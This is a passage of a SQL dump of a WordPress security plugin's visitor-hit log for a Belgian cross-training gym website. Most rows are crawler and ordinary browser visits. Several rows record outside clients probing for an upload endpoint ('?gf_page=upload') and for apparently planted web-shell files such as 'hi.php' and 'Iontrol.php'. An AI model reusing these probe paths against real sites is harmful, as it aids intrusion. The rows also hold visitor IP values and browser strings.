(71186, 1493718969.741429, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71187, 1493718972.965780, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71188, 1493718978.357210, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71189, 1493718989.692809, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71190, 1493718993.880166, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71191, 1493718997.870315, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71192, 1493719002.788967, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71193, 1493722927.632461, 1755877124, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-json/wp/v2/posts/', '', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'),
(71194, 1493723658.437563, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71195, 1493723658.921525, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71196, 1493723659.370278, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71197, 1493723659.801323, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71198, 1493723660.221442, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71199, 1493723660.673018, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71200, 1493723661.185789, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71201, 1493723661.621694, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71202, 1493723662.038653, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71203, 1493723662.463879, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71204, 1493723662.899416, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71205, 1493725598.268650, 3652617232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71206, 1493728398.764166, 2989639598, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71207, 1493728400.208872, 2989639598, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71208, 1493728413.080463, 2989639598, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71209, 1493736992.103244, 1539837611, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0'),
(71210, 1493736992.718687, 1539837611, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/?gf_page=upload', '', 'Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0'),
(71211, 1493736993.257769, 1539837611, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/?gf_page=upload', '', 'Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0'),
(71212, 1493738203.747751, 2644818889, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71213, 1493738204.608400, 2644818889, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71214, 1493739107.186013, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71215, 1493739107.623459, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71216, 1493739108.095542, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71217, 1493739108.514391, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71218, 1493739108.994675, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71219, 1493739109.407677, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71220, 1493739110.048560, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71221, 1493739110.773158, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71222, 1493739111.175205, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71223, 1493739111.591710, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71224, 1493739111.999769, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71225, 1493739112.457106, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71226, 1493739112.862382, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71227, 1493739113.292239, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71228, 1493742441.239723, 2509962544, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71229, 1493747525.226658, 2509962544, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71230, 1493752299.572333, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/Iontrol.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71231, 1493757666.585742, 676177835, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71232, 1493758288.920378, 1123632475, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71233, 1493759239.037824, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(71234, 1493759243.897988, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(71235, 1493763146.751497, 1123632454, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71236, 1493763611.043289, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/hi.php?0=1', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71237, 1493766487.410432, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71238, 1493771677.625945, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71239, 1493774547.547009, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71240, 1493774548.031680, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71241, 1493777897.057364, 1123633430, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71242, 1493777898.104610, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71243, 1493784451.353856, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/imdex.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71244, 1493790264.039972, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71245, 1493791588.488634, 3252386809, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&cad=rja&uact=8&ved=0ahUKEwjavNyah9PTAhUMLVAKHWiPALUQFghgMAk&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71246, 1493791591.307880, 3252386809, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71247, 1493791714.279846, 3252386809, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71248, 1493791715.537883, 3252386809, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71249, 1493793601.057002, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71250, 1493801201.170973, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/webconfig.txt.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71251, 1493802602.539856, 2193201697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3'),
(71252, 1493802603.073911, 2193201697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3'),
(71253, 1493809212.733789, 2366158852, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71254, 1493809216.114696, 2366145591, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71255, 1493811641.522507, 757109195, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71256, 1493811645.894704, 757109195, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71257, 1493813260.065844, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71258, 1493813261.229571, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71259, 1493813261.821652, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71260, 1493813262.322156, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71261, 1493813263.023235, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71262, 1493813263.450203, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71263, 1493813263.852409, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71264, 1493813264.290293, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71265, 1493813264.808347, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71266, 1493813265.212056, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71267, 1493813265.619340, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71268, 1493813266.104813, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71269, 1493813266.521048, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71270, 1493813266.979643, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71271, 1493815304.261279, 3024883593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(71272, 1493815304.659773, 3024883466, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(71273, 1493815351.393171, 1324940073, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71274, 1493815356.394293, 1324940073, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71275, 1493815502.808401, 3024883475, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71276, 1493815515.968478, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71277, 1493815516.697310, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71278, 1493815520.853656, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71279, 1493815527.815100, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71280, 1493815535.077295, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71281, 1493815541.479469, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71282, 1493815547.571827, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71283, 1493815554.544259, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71284, 1493815562.314256, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71285, 1493815567.474604, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71286, 1493815572.094455, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-n%3C%21DOCTYPE%20html%20PUBLIC', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71287, 1493815579.718051, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71288, 1493815814.057772, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71289, 1493816496.547492, 2644818889, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71290, 1493816497.407565, 2644818889, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71291, 1493816525.673769, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71292, 1493816526.737050, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71293, 1493816547.318829, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71294, 1493816548.313026, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71295, 1493816569.596018, 1837372382, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71296, 1493816573.641010, 1837372382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71297, 1493816653.326228, 1837372382, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71298, 1493816655.243866, 1837372382, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71299, 1493816673.278185, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71300, 1493816674.734396, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71301, 1493816702.804275, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71302, 1493816704.100079, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71303, 1493816704.341505, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71304, 1493816803.215496, 1837372382, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71305, 1493816804.814125, 1837372382, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71306, 1493816861.899227, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
